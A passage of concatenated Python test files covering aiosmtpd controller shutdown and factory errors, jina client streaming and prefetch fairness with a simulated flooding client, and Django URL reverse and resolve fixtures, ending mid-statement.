            Sink(), unix_socket=sockfile, loop=autostop_loop
        )
        cont.begin()
        # Make sure event loop is not running (will be started in thread)
        assert autostop_loop.is_running() is False
        runner(autostop_loop)
        # Make sure event loop is up and running (started within thread)
        assert autostop_loop.is_running() is True
        # Check we can connect
        assert_smtp_socket(cont)
        # Wait until thread ends, which it will be when the loop autostops
        runner.join(timeout=AUTOSTOP_DELAY)
        assert runner.is_alive() is False
        catchup_delay()
        assert autostop_loop.is_running() is False
        # At this point, the loop _has_ stopped, but the task is still listening
        assert assert_smtp_socket(cont) is False
        # Stop the task
        cont.end()
        catchup_delay()
        # Now the listener has gone away
        # noinspection PyTypeChecker
        with pytest.raises((socket.timeout, ConnectionError)):
            assert_smtp_socket(cont)

    @pytest.mark.filterwarnings(
        "ignore::pytest.PytestUnraisableExceptionWarning"
    )
    def test_inet_loopstop(self, autostop_loop, runner):
        """
        Verify behavior when the loop is stopped before controller is stopped
        """
        autostop_loop.set_debug(True)
        cont = UnthreadedController(Sink(), loop=autostop_loop)
        cont.begin()
        # Make sure event loop is not running (will be started in thread)
        assert autostop_loop.is_running() is False
        runner(autostop_loop)
        # Make sure event loop is up and running (started within thread)
        assert autostop_loop.is_running() is True
        # Check we can connect
        with SMTPClient(cont.hostname, cont.port, timeout=AUTOSTOP_DELAY) as client:
            code, _ = client.helo("example.org")
            assert code == 250
        # Wait until thread ends, which it will be when the loop autostops
        runner.join(timeout=AUTOSTOP_DELAY)
        assert runner.is_alive() is False
        catchup_delay()
        assert autostop_loop.is_running() is False
        # At this point, the loop _has_ stopped, but the task is still listening,
        # so rather than socket.timeout, we'll get a refusal instead, thus causing
        # SMTPServerDisconnected
        with pytest.raises(SMTPServerDisconnected):
            SMTPClient(cont.hostname, cont.port, timeout=0.1)
        cont.end()
        catchup_delay()
        cont.ended.wait()
        # Now the listener has gone away, and thus we will end up with socket.timeout
        # or ConnectionError (depending on OS)
        # noinspection PyTypeChecker
        with pytest.raises((socket.timeout, ConnectionError)):
            SMTPClient(cont.hostname, cont.port, timeout=0.1)

    @pytest.mark.filterwarnings(
        "ignore::pytest.PytestUnraisableExceptionWarning"
    )
    def test_inet_contstop(self, temp_event_loop, runner):
        """
        Verify behavior when the controller is stopped before loop is stopped
        """
        cont = UnthreadedController(Sink(), loop=temp_event_loop)
        cont.begin()
        # Make sure event loop is not running (will be started in thread)
        assert temp_event_loop.is_running() is False
        runner(temp_event_loop)
        # Make sure event loop is up and running
        assert temp_event_loop.is_running() is True
        try:
            # Check that we can connect
            with SMTPClient(cont.hostname, cont.port, timeout=AUTOSTOP_DELAY) as client:
                code, _ = client.helo("example.org")
                assert code == 250
                client.quit()
            catchup_delay()
            temp_event_loop.call_soon_threadsafe(cont.end)
            for _ in range(10):  # 10 is arbitrary
                catchup_delay()  # effectively yield to other threads/event loop
                if cont.ended.wait(1.0):
                    break
            assert temp_event_loop.is_running() is True
            # Because we've called .end() there, the server listener should've gone
            # away, so we should end up with a socket.timeout or ConnectionError or
            # SMTPServerDisconnected (depending on lotsa factors)
            expect_errs = (socket.timeout, ConnectionError, SMTPServerDisconnected)
            # noinspection PyTypeChecker
            with pytest.raises(expect_errs):
                SMTPClient(cont.hostname, cont.port, timeout=0.1)
        finally:
            # Wrap up, or else we'll hang
            temp_event_loop.call_soon_threadsafe(cont.cancel_tasks)
            catchup_delay()
            runner.join()
        assert runner.is_alive() is False
        assert temp_event_loop.is_running() is False
        assert temp_event_loop.is_closed() is False
@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
class TestFactory:
    """Exercise Controller.start() around SMTP-factory success and failure."""

    def test_normal_situation(self):
        # Happy path: factory produces an smtpd and no thread error is recorded.
        controller = Controller(Sink())
        try:
            controller.start()
            catchup_delay()
            assert controller.smtpd is not None
            assert controller._thread_exception is None
        finally:
            controller.stop()

    def test_unknown_args_direct(self, silence_event_loop_closed: bool):
        # An unexpected kwarg handed straight to Controller surfaces as TypeError.
        unknown = "this_is_an_unknown_kwarg"
        controller = Controller(Sink(), ready_timeout=0.3, **{unknown: True})
        expected_re = r"__init__.. got an unexpected keyword argument '" + unknown + r"'"
        try:
            with pytest.raises(TypeError, match=expected_re):
                controller.start()
            assert controller.smtpd is None
            assert isinstance(controller._thread_exception, TypeError)
        finally:
            controller.stop()

    @pytest.mark.filterwarnings(
        "ignore:server_kwargs will be removed:DeprecationWarning"
    )
    def test_unknown_args_inkwargs(self, silence_event_loop_closed: bool):
        # Same failure mode when the unknown kwarg travels via server_kwargs.
        unknown = "this_is_an_unknown_kwarg"
        controller = Controller(Sink(), ready_timeout=0.3, server_kwargs={unknown: True})
        expected_re = r"__init__.. got an unexpected keyword argument '" + unknown + r"'"
        try:
            with pytest.raises(TypeError, match=expected_re):
                controller.start()
            assert controller.smtpd is None
        finally:
            controller.stop()

    def test_factory_none(self, mocker: MockFixture, silence_event_loop_closed: bool):
        # Hypothetical situation where factory() did not raise an Exception
        # but returned None instead.
        mocker.patch("aiosmtpd.controller.SMTP", return_value=None)
        controller = Controller(Sink(), ready_timeout=0.3)
        expected_re = r"factory\(\) returned None"
        try:
            with pytest.raises(RuntimeError, match=expected_re):
                controller.start()
            assert controller.smtpd is None
        finally:
            controller.stop()

    def test_noexc_smtpd_missing(
        self, mocker: MockFixture, silence_event_loop_closed: bool
    ):
        # Hypothetical situation where factory() failed but no Exception
        # was recorded on the controller.
        controller = Controller(Sink())

        def wipe_thread_exception(*args, **kwargs):
            controller._thread_exception = None
            # Still hand back an (unmocked) _FakeServer so teardown stays
            # clean; the extra noise doesn't affect the test.
            return _FakeServer(controller.loop)

        mocker.patch("aiosmtpd.controller._FakeServer", side_effect=wipe_thread_exception)
        mocker.patch(
            "aiosmtpd.controller.SMTP", side_effect=RuntimeError("Simulated Failure")
        )
        expected_re = r"Unknown Error, failed to init SMTP server"
        try:
            with pytest.raises(RuntimeError, match=expected_re):
                controller.start()
            assert controller.smtpd is None
            assert controller._thread_exception is None
        finally:
            controller.stop()
class TestCompat:
    """Backward-compatibility checks for the public package surface."""

    def test_version(self):
        # The package root and aiosmtpd.smtp must expose the very same
        # version object (aliasing, not merely equal strings).
        from aiosmtpd import __version__ as init_version
        from aiosmtpd.smtp import __version__ as smtp_version

        assert init_version is smtp_version
|
test_clients_streaming.py | import asyncio
import os
import time
from datetime import datetime
from functools import partial
from multiprocessing import Process, current_process
from typing import List
import pytest
from jina import Client, Document, DocumentArray, Executor, Flow, requests
# Number of documents every client generator yields.
INPUT_LEN = 4
# Seconds the "slow" generators pause between documents.
INPUT_GEN_SLEEP_TIME = 1
# Seconds SlowExecutor sleeps before handling each request.
SLOW_EXECUTOR_SLEEP_TIME = 5
def readable_time_from(t):
    """Render epoch seconds *t* as a UTC ``MM:SS:microseconds`` string.

    Uses a timezone-aware conversion because ``datetime.utcfromtimestamp``
    is deprecated (Python 3.12+); the output is byte-identical to the
    old naive-UTC form.
    """
    from datetime import timezone  # local import: module only imports `datetime`

    return datetime.fromtimestamp(t, tz=timezone.utc).strftime('%M:%S:%f')
def get_document(i, name):
    """Build a Document whose tags record its creation timestamp."""
    t = time.time()
    msg = f'in {name} {i}, time: {readable_time_from(t)}, {t}'
    print(msg, flush=True)
    return Document(id=f'id-{i}', tags={'input_gen': t})
def blocking_gen():
    """Fast synchronous client generator (0.1s pause between docs)."""
    count = 0
    while count < INPUT_LEN:
        yield get_document(count, name='blocking_gen')
        time.sleep(0.1)
        count += 1
async def async_gen():
    """Fast async client generator (0.1s pause between docs)."""
    count = 0
    while count < INPUT_LEN:
        yield get_document(count, name='async_gen')
        await asyncio.sleep(0.1)
        count += 1
def slow_blocking_gen():
    """Slow synchronous client generator (INPUT_GEN_SLEEP_TIME pause per doc)."""
    count = 0
    while count < INPUT_LEN:
        yield get_document(count, name='slow_blocking_gen')
        time.sleep(INPUT_GEN_SLEEP_TIME)
        count += 1
async def slow_async_gen():
    """Slow async client generator (INPUT_GEN_SLEEP_TIME pause per doc)."""
    count = 0
    while count < INPUT_LEN:
        yield get_document(count, name='slow_async_gen')
        await asyncio.sleep(INPUT_GEN_SLEEP_TIME)
        count += 1
class FastExecutor(Executor):
    """Executor that tags documents immediately, with no artificial delay."""

    @requests
    def foo(self, docs: DocumentArray, **kwargs):
        # Stamp each doc with the moment the Executor touched it.
        for doc in docs:
            doc.tags['executor'] = time.time()
            msg = f'in FastExecutor: {doc.id}, time: {readable_time_from(doc.tags["executor"])}, {doc.tags["executor"]}'
            print(msg, flush=True)
class SlowExecutor(Executor):
    """Slow Executor: sleeps SLOW_EXECUTOR_SLEEP_TIME secs before each request."""

    @requests
    def foo(self, docs: DocumentArray, **kwargs):
        # Simulate an expensive request before stamping the documents.
        time.sleep(SLOW_EXECUTOR_SLEEP_TIME)
        for doc in docs:
            doc.tags['executor'] = time.time()
            msg = f'in SlowExecutor: {doc.id}, time: {readable_time_from(doc.tags["executor"])}, {doc.tags["executor"]}'
            print(msg, flush=True)
def on_done(response, final_da: DocumentArray):
    """Client callback: timestamp each returned doc and collect it into *final_da*."""
    print(f' receiving response {response._pb_body.header.request_id}')
    received = response.docs
    for doc in received:
        doc.tags['on_done'] = time.time()
        msg = f'in on_done {doc.id}, time: {readable_time_from(doc.tags["on_done"])}, {doc.tags["on_done"]}'
        print(msg, flush=True)
    final_da.extend(received)
@pytest.mark.parametrize(
    'protocol, inputs',
    [
        ('grpc', slow_async_gen),
        pytest.param(
            'grpc',
            slow_blocking_gen,
            marks=pytest.mark.skip(
                reason='grpc client + sync generator with time.sleep is expected to fail'
            ),
        ),
        ('websocket', slow_async_gen),
        ('websocket', slow_blocking_gen),
        ('http', slow_async_gen),
        ('http', slow_blocking_gen),
    ],
)
def test_disable_prefetch_slow_client_fast_executor(protocol, inputs):
    """Slow client + fast Executor: each request fully completes
    (input_gen -> executor -> on_done) before the slow generator even
    produces the next one.
    """
    print(
        f'\n\nRunning disable prefetch, slow client, fast Executor test for \n'
        f'protocol: {protocol}, input: {inputs.__name__}'
    )
    final_da = DocumentArray()
    with Flow(protocol=protocol).add(uses=FastExecutor) as f:
        f.post(
            on='/',
            inputs=inputs,
            request_size=1,
            on_done=lambda response: on_done(response, final_da),
        )
    assert len(final_da) == INPUT_LEN
    # Since the input_gen is slow, order will always be gen -> exec -> on_done
    # for every request. Loop over INPUT_LEN instead of hard-coding each id so
    # the assertions stay in sync with the generators.
    for i in range(INPUT_LEN):
        doc = final_da[f'id-{i}']
        assert doc.tags['input_gen'] < doc.tags['executor']
        assert doc.tags['executor'] < doc.tags['on_done']
        if i + 1 < INPUT_LEN:
            # Request i must be fully done before request i+1 is generated.
            assert doc.tags['on_done'] < final_da[f'id-{i + 1}'].tags['input_gen']
@pytest.mark.parametrize(
    'protocol, inputs',
    [
        ('grpc', async_gen),
        ('grpc', blocking_gen),
        ('websocket', async_gen),
        ('websocket', blocking_gen),
        ('http', async_gen),
        ('http', blocking_gen),
    ],
)
def test_disable_prefetch_fast_client_slow_executor(protocol, inputs):
    """Fast client + slow Executor: all inputs are read before the first
    request leaves the Executor, and responses start arriving while later
    requests are still being processed.
    """
    print(
        f'\n\nRunning disable prefetch, fast client, slow Executor test for \n'
        f'protocol: {protocol}, input: {inputs.__name__}'
    )
    final_da = DocumentArray()
    with Flow(protocol=protocol).add(uses=SlowExecutor) as f:
        f.post(
            on='/',
            inputs=inputs,
            request_size=1,
            on_done=lambda response: on_done(response, final_da),
        )
    assert len(final_da) == INPUT_LEN
    # Since the Executor is slow, all client inputs should be read before the
    # 1st request exits from the Executor. Loop over INPUT_LEN instead of
    # hard-coding each id so the assertions stay in sync with the generators.
    for i in range(INPUT_LEN - 1):
        assert final_da[f'id-{i}'].id < final_da[f'id-{i + 1}'].id, (
            f'ids are not ordered with times {final_da[f"id-{i}"].tags["input_gen"]} '
            f'and {final_da[f"id-{i + 1}"].tags["input_gen"]}'
        )
        assert (
            final_da[f'id-{i}'].tags['input_gen']
            < final_da[f'id-{i + 1}'].tags['input_gen']
        )
    assert (
        final_da[f'id-{INPUT_LEN - 1}'].tags['input_gen']
        < final_da['id-0'].tags['executor']
    )
    # At least 1 request should reach `on_done` before all requests are
    # processed in the Executor.
    # Validates that the requests are not pending at the Executor
    first_on_done_time = min(i.tags['on_done'] for i in final_da)
    last_executor_time = max(i.tags['executor'] for i in final_da)
    assert first_on_done_time < last_executor_time
class Indexer(Executor):
    """Toy indexer used by test_multiple_clients.

    NOTE: ``docs`` is deliberately a *class* attribute, so indexed documents
    accumulate for the lifetime of the Executor process, letting ``/status``
    report everything indexed so far across requests.
    """

    docs = DocumentArray()

    @requests(on='/index')
    def index(self, docs: DocumentArray, **kwargs):
        # Small sleep to simulate indexing work so client requests interleave.
        time.sleep(0.1)
        self.docs.extend(docs)

    @requests(on='/status')
    def status(self, **kwargs):
        # returns ids of all docs in tags
        return DocumentArray(Document(tags={'ids': self.docs[:, 'id']}))
@pytest.fixture()
def info_log_level():
    """Temporarily force JINA_LOG_LEVEL=INFO, restoring the prior state on teardown.

    Uses ``os.environ.get`` so the fixture does not raise KeyError when the
    variable is unset, and removes the variable again on teardown in that
    case instead of writing ``None`` back.
    """
    log_level = os.environ.get('JINA_LOG_LEVEL')
    os.environ['JINA_LOG_LEVEL'] = 'INFO'
    yield
    if log_level is None:
        os.environ.pop('JINA_LOG_LEVEL', None)
    else:
        os.environ['JINA_LOG_LEVEL'] = log_level
@pytest.mark.parametrize('prefetch', [0, 5])
@pytest.mark.parametrize('protocol', ['websocket', 'http', 'grpc'])
def test_multiple_clients(prefetch, protocol, info_log_level):
    """Five well-behaved clients plus one flooding client share one gateway;
    verify every doc is indexed and that prefetch (where supported) throttles
    the flooder.
    """
    GOOD_CLIENTS = 5
    GOOD_CLIENT_NUM_DOCS = 20
    MALICIOUS_CLIENT_NUM_DOCS = 50

    # NOTE: intentionally shadows the module-level get_document(i, name);
    # ids here encode the originating process name instead.
    def get_document(i):
        return Document(
            id=f'{current_process().name}_{i}',
            # ~2KB random payload; str(bytes(...)) stores its repr as text.
            text=str(bytes(bytearray(os.urandom(512 * 4)))),
        )

    async def good_client_gen():
        # Controlled stream: one doc per 0.1s.
        for i in range(GOOD_CLIENT_NUM_DOCS):
            yield get_document(i)
            await asyncio.sleep(0.1)

    async def malicious_client_gen():
        # No pauses: floods the gateway as fast as it can.
        for i in range(1000, 1000 + MALICIOUS_CLIENT_NUM_DOCS):
            yield get_document(i)

    def client(gen, port):
        # Runs in a child process; posts the whole generator to /index.
        Client(protocol=protocol, port=port).post(
            on='/index', inputs=gen, request_size=1, return_responses=True
        )

    pool: List[Process] = []
    f = Flow(protocol=protocol, prefetch=prefetch).add(uses=Indexer)
    with f:
        # We have 5 good clients connecting to the same gateway. They have controlled requests.
        # Each client sends `GOOD_CLIENT_NUM_DOCS` (20) requests and sleeps after each request.
        for i in range(GOOD_CLIENTS):
            p = Process(
                target=partial(client, good_client_gen, f.port),
                name=f'goodguy_{i}',
            )
            p.start()
            pool.append(p)
        # and 1 malicious client, sending lot of requests (trying to block others)
        p = Process(
            target=partial(client, malicious_client_gen, f.port),
            name='badguy',
        )
        p.start()
        pool.append(p)
        for p in pool:
            p.join()
        # Ask the Indexer (via /status) in which order ids were indexed.
        order_of_ids = list(
            Client(protocol=protocol, port=f.port)
            .post(on='/status', inputs=[Document()], return_responses=True)[0]
            .docs[0]
            .tags['ids']
        )
        # There must be total 150 docs indexed.
        assert (
            len(order_of_ids)
            == GOOD_CLIENTS * GOOD_CLIENT_NUM_DOCS + MALICIOUS_CLIENT_NUM_DOCS
        )
    """
    If prefetch is set, each Client is allowed (max) 5 requests at a time.
    Since requests are controlled, `badguy` has to do the last 20 requests.
    If prefetch is disabled, clients can freeflow requests. No client is blocked.
    Hence last 20 requests go from `goodguy`.
    (Ideally last 30 requests should be validated, to avoid flaky CI, we test last 20)
    When there are no rules, badguy wins! With rule, you find balance in the world.
    """
    if protocol == 'http':
        # There's no prefetch for http.
        assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'goodguy'}
    elif prefetch == 5:
        assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'badguy'}
    elif prefetch == 0:
        assert set(map(lambda x: x.split('_')[0], order_of_ids[-20:])) == {'goodguy'}
|
tests.py | """
Unit tests for reverse URL lookups.
"""
import sys
import threading
from admin_scripts.tests import AdminScriptTestCase
from django.conf import settings
from django.conf.urls import include, url
from django.contrib.auth.models import User
from django.core.exceptions import ImproperlyConfigured, ViewDoesNotExist
from django.http import (
HttpRequest, HttpResponsePermanentRedirect, HttpResponseRedirect,
)
from django.shortcuts import redirect
from django.test import SimpleTestCase, TestCase, override_settings
from django.test.utils import override_script_prefix
from django.urls import (
NoReverseMatch, Resolver404, ResolverMatch, URLPattern, URLResolver,
get_callable, get_resolver, get_urlconf, resolve, reverse, reverse_lazy,
)
from django.urls.resolvers import RegexPattern
from . import middleware, urlconf_outer, views
from .utils import URLObject
from .views import empty_view
# Fixtures consumed by the resolve() tests: each row pins down the full
# ResolverMatch that a given path must produce.
resolve_test_data = (
    # These entries are in the format: (path, url_name, app_name, namespace, view_name, func, args, kwargs)
    # Simple case
    ('/normal/42/37/', 'normal-view', '', '', 'normal-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}),
    (
        '/view_class/42/37/', 'view-class', '', '', 'view-class', views.view_class_instance, (),
        {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/included/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
        'included_namespace_urls', 'included_namespace_urls:inc-normal-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/included/view_class/42/37/', 'inc-view-class', 'included_namespace_urls',
        'included_namespace_urls', 'included_namespace_urls:inc-view-class',
        views.view_class_instance, (), {'arg1': '42', 'arg2': '37'}
    ),
    # Unnamed args are dropped if you have *any* kwargs in a pattern
    ('/mixed_args/42/37/', 'mixed-args', '', '', 'mixed-args', views.empty_view, (), {'arg2': '37'}),
    (
        '/included/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
        'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
        views.empty_view, (), {'arg2': '37'}
    ),
    (
        '/included/12/mixed_args/42/37/', 'inc-mixed-args', 'included_namespace_urls',
        'included_namespace_urls', 'included_namespace_urls:inc-mixed-args',
        views.empty_view, (), {'arg2': '37'}
    ),
    # Unnamed views should have None as the url_name. Regression data for #21157.
    (
        '/unnamed/normal/42/37/', None, '', '', 'urlpatterns_reverse.views.empty_view', views.empty_view, (),
        {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/unnamed/view_class/42/37/', None, '', '', 'urlpatterns_reverse.views.ViewClass', views.view_class_instance,
        (), {'arg1': '42', 'arg2': '37'}
    ),
    # If you have no kwargs, you get an args list.
    ('/no_kwargs/42/37/', 'no-kwargs', '', '', 'no-kwargs', views.empty_view, ('42', '37'), {}),
    (
        '/included/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
        'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
        views.empty_view, ('42', '37'), {}
    ),
    (
        '/included/12/no_kwargs/42/37/', 'inc-no-kwargs', 'included_namespace_urls',
        'included_namespace_urls', 'included_namespace_urls:inc-no-kwargs',
        views.empty_view, ('12', '42', '37'), {}
    ),
    # Namespaces
    (
        '/test1/inner/42/37/', 'urlobject-view', 'testapp', 'test-ns1', 'test-ns1:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
        'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/ns-included1/normal/42/37/', 'inc-normal-view', 'included_namespace_urls',
        'inc-ns1', 'inc-ns1:inc-normal-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    # NOTE(review): this entry duplicates the '/included/test3/inner/42/37/'
    # entry above — presumably a copy-paste leftover; confirm before removing.
    (
        '/included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
        'included_namespace_urls:test-ns3', 'included_namespace_urls:test-ns3:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/default/inner/42/37/', 'urlobject-view', 'testapp', 'testapp', 'testapp:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/other2/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns2', 'other-ns2:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/other1/inner/42/37/', 'urlobject-view', 'nodefault', 'other-ns1', 'other-ns1:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    # Nested namespaces
    (
        '/ns-included1/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp',
        'inc-ns1:test-ns3', 'inc-ns1:test-ns3:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/ns-included1/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
        'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
        'inc-ns1:inc-ns4:inc-ns2:test-ns3',
        'inc-ns1:inc-ns4:inc-ns2:test-ns3:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/app-included/test3/inner/42/37/', 'urlobject-view', 'included_namespace_urls:testapp', 'inc-app:test-ns3',
        'inc-app:test-ns3:urlobject-view', views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    (
        '/app-included/ns-included4/ns-included2/test3/inner/42/37/', 'urlobject-view',
        'included_namespace_urls:namespace_urls:included_namespace_urls:testapp',
        'inc-app:inc-ns4:inc-ns2:test-ns3',
        'inc-app:inc-ns4:inc-ns2:test-ns3:urlobject-view',
        views.empty_view, (), {'arg1': '42', 'arg2': '37'}
    ),
    # Namespaces capturing variables
    (
        '/inc70/', 'inner-nothing', 'included_urls', 'inc-ns5', 'inc-ns5:inner-nothing',
        views.empty_view, (), {'outer': '70'}
    ),
    (
        '/inc78/extra/foobar/', 'inner-extra', 'included_urls', 'inc-ns5', 'inc-ns5:inner-extra',
        views.empty_view, (), {'outer': '78', 'extra': 'foobar'}
    ),
)
# Fixtures consumed by the reverse() tests. Each row is
# (url_name, expected_path_or_NoReverseMatch, args, kwargs); an exception
# class in the second slot means reversing must fail with it.
test_data = (
    ('places', '/places/3/', [3], {}),
    ('places', '/places/3/', ['3'], {}),
    ('places', NoReverseMatch, ['a'], {}),
    ('places', NoReverseMatch, [], {}),
    ('places?', '/place/', [], {}),
    ('places+', '/places/', [], {}),
    ('places*', '/place/', [], {}),
    ('places2?', '/', [], {}),
    ('places2+', '/places/', [], {}),
    ('places2*', '/', [], {}),
    ('places3', '/places/4/', [4], {}),
    ('places3', '/places/harlem/', ['harlem'], {}),
    ('places3', NoReverseMatch, ['harlem64'], {}),
    ('places4', '/places/3/', [], {'id': 3}),
    ('people', NoReverseMatch, [], {}),
    ('people', '/people/adrian/', ['adrian'], {}),
    ('people', '/people/adrian/', [], {'name': 'adrian'}),
    ('people', NoReverseMatch, ['name with spaces'], {}),
    ('people', NoReverseMatch, [], {'name': 'name with spaces'}),
    ('people2', '/people/name/', [], {}),
    ('people2a', '/people/name/fred/', ['fred'], {}),
    ('people_backref', '/people/nate-nate/', ['nate'], {}),
    ('people_backref', '/people/nate-nate/', [], {'name': 'nate'}),
    ('optional', '/optional/fred/', [], {'name': 'fred'}),
    ('optional', '/optional/fred/', ['fred'], {}),
    ('named_optional', '/optional/1/', [1], {}),
    ('named_optional', '/optional/1/', [], {'arg1': 1}),
    ('named_optional', '/optional/1/2/', [1, 2], {}),
    ('named_optional', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
    ('named_optional_terminated', '/optional/1/2/', [1, 2], {}),
    ('named_optional_terminated', '/optional/1/2/', [], {'arg1': 1, 'arg2': 2}),
    ('hardcoded', '/hardcoded/', [], {}),
    ('hardcoded2', '/hardcoded/doc.pdf', [], {}),
    ('people3', '/people/il/adrian/', [], {'state': 'il', 'name': 'adrian'}),
    ('people3', NoReverseMatch, [], {'state': 'il'}),
    ('people3', NoReverseMatch, [], {'name': 'adrian'}),
    ('people4', NoReverseMatch, [], {'state': 'il', 'name': 'adrian'}),
    ('people6', '/people/il/test/adrian/', ['il/test', 'adrian'], {}),
    ('people6', '/people//adrian/', ['adrian'], {}),
    ('range', '/character_set/a/', [], {}),
    ('range2', '/character_set/x/', [], {}),
    ('price', '/price/$10/', ['10'], {}),
    ('price2', '/price/$10/', ['10'], {}),
    ('price3', '/price/$10/', ['10'], {}),
    ('product', '/product/chocolate+($2.00)/', [], {'price': '2.00', 'product': 'chocolate'}),
    ('headlines', '/headlines/2007.5.21/', [], {'year': 2007, 'month': 5, 'day': 21}),
    (
        'windows', r'/windows_path/C:%5CDocuments%20and%20Settings%5Cspam/', [],
        {'drive_name': 'C', 'path': r'Documents and Settings\spam'}
    ),
    ('special', r'/special_chars/~@+%5C$*%7C/', [r'~@+\$*|'], {}),
    ('special', r'/special_chars/some%20resource/', [r'some resource'], {}),
    ('special', r'/special_chars/10%25%20complete/', [r'10% complete'], {}),
    ('special', r'/special_chars/some%20resource/', [], {'chars': r'some resource'}),
    ('special', r'/special_chars/10%25%20complete/', [], {'chars': r'10% complete'}),
    ('special', NoReverseMatch, [''], {}),
    ('mixed', '/john/0/', [], {'name': 'john'}),
    ('repeats', '/repeats/a/', [], {}),
    ('repeats2', '/repeats/aa/', [], {}),
    ('repeats3', '/repeats/aa/', [], {}),
    ('test', '/test/1', [], {}),
    ('inner-nothing', '/outer/42/', [], {'outer': '42'}),
    ('inner-nothing', '/outer/42/', ['42'], {}),
    ('inner-nothing', NoReverseMatch, ['foo'], {}),
    ('inner-extra', '/outer/42/extra/inner/', [], {'extra': 'inner', 'outer': '42'}),
    ('inner-extra', '/outer/42/extra/inner/', ['42', 'inner'], {}),
    ('inner-extra', NoReverseMatch, ['fred', 'inner'], {}),
    ('inner-no-kwargs', '/outer-no-kwargs/42/inner-no-kwargs/1/', ['42', '1'], {}),
    ('disjunction', NoReverseMatch, ['foo'], {}),
    ('inner-disjunction', NoReverseMatch, ['10', '11'], {}),
    ('extra-places', '/e-places/10/', ['10'], {}),
    ('extra-people', '/e-people/fred/', ['fred'], {}),
    ('extra-people', '/e-people/fred/', [], {'name': 'fred'}),
    ('part', '/part/one/', [], {'value': 'one'}),
    ('part', '/prefix/xx/part/one/', [], {'value': 'one', 'prefix': 'xx'}),
    ('part2', '/part2/one/', [], {'value': 'one'}),
    ('part2', '/part2/', [], {}),
    ('part2', '/prefix/xx/part2/one/', [], {'value': 'one', 'prefix': 'xx'}),
    ('part2', '/prefix/xx/part2/', [], {'prefix': 'xx'}),
    # Tests for nested groups. Nested capturing groups will only work if you
    # *only* supply the correct outer group.
    ('nested-noncapture', '/nested/noncapture/opt', [], {'p': 'opt'}),
    ('nested-capture', '/nested/capture/opt/', ['opt/'], {}),
    ('nested-capture', NoReverseMatch, [], {'p': 'opt'}),
    ('nested-mixedcapture', '/nested/capture/mixed/opt', ['opt'], {}),
    ('nested-mixedcapture', NoReverseMatch, [], {'p': 'opt'}),
    ('nested-namedcapture', '/nested/capture/named/opt/', [], {'outer': 'opt/'}),
    ('nested-namedcapture', NoReverseMatch, [], {'outer': 'opt/', 'inner': 'opt'}),
    ('nested-namedcapture', NoReverseMatch, [], {'inner': 'opt'}),
    ('non_path_include', '/includes/non_path_include/', [], {}),
    # Tests for #13154
    ('defaults', '/defaults_view1/3/', [], {'arg1': 3, 'arg2': 1}),
    ('defaults', '/defaults_view2/3/', [], {'arg1': 3, 'arg2': 2}),
    ('defaults', NoReverseMatch, [], {'arg1': 3, 'arg2': 3}),
    ('defaults', NoReverseMatch, [], {'arg2': 1}),
    # Security tests
    ('security', '/%2Fexample.com/security/', ['/example.com'], {}),
)
@override_settings(ROOT_URLCONF='urlpatterns_reverse.no_urls')
class NoURLPatternsTests(SimpleTestCase):
    def test_no_urls_exception(self):
        """
        URLResolver should raise an exception when no urlpatterns exist.
        """
        resolver = URLResolver(RegexPattern(r'^$'), settings.ROOT_URLCONF)
        expected_msg = (
            "The included URLconf 'urlpatterns_reverse.no_urls' does not "
            "appear to have any patterns in it. If you see valid patterns in "
            "the file then the issue is probably caused by a circular import."
        )
        # Accessing url_patterns triggers the lazy import of the URLconf.
        with self.assertRaisesMessage(ImproperlyConfigured, expected_msg):
            getattr(resolver, 'url_patterns')
@override_settings(ROOT_URLCONF='urlpatterns_reverse.urls')
class URLPatternReverse(SimpleTestCase):
    """Tests for reverse() against the patterns in urlpatterns_reverse.urls."""

    def test_urlpattern_reverse(self):
        # Data-driven: each test_data row either reverses to an exact path, or
        # names NoReverseMatch as the expected outcome.
        for name, expected, args, kwargs in test_data:
            with self.subTest(name=name, args=args, kwargs=kwargs):
                try:
                    got = reverse(name, args=args, kwargs=kwargs)
                except NoReverseMatch:
                    self.assertEqual(NoReverseMatch, expected)
                else:
                    self.assertEqual(got, expected)

    def test_reverse_none(self):
        # Reversing None should raise an error, not return the last un-named view.
        with self.assertRaises(NoReverseMatch):
            reverse(None)

    def test_mixing_args_and_kwargs(self):
        msg = "Don't mix *args and **kwargs in call to reverse()!"
        with self.assertRaisesMessage(ValueError, msg):
            reverse('name', args=['a'], kwargs={'b': 'c'})

    @override_script_prefix('/{{invalid}}/')
    def test_prefix_braces(self):
        # Braces in the script prefix must be percent-encoded in the result.
        self.assertEqual(
            '/%7B%7Binvalid%7D%7D/includes/non_path_include/',
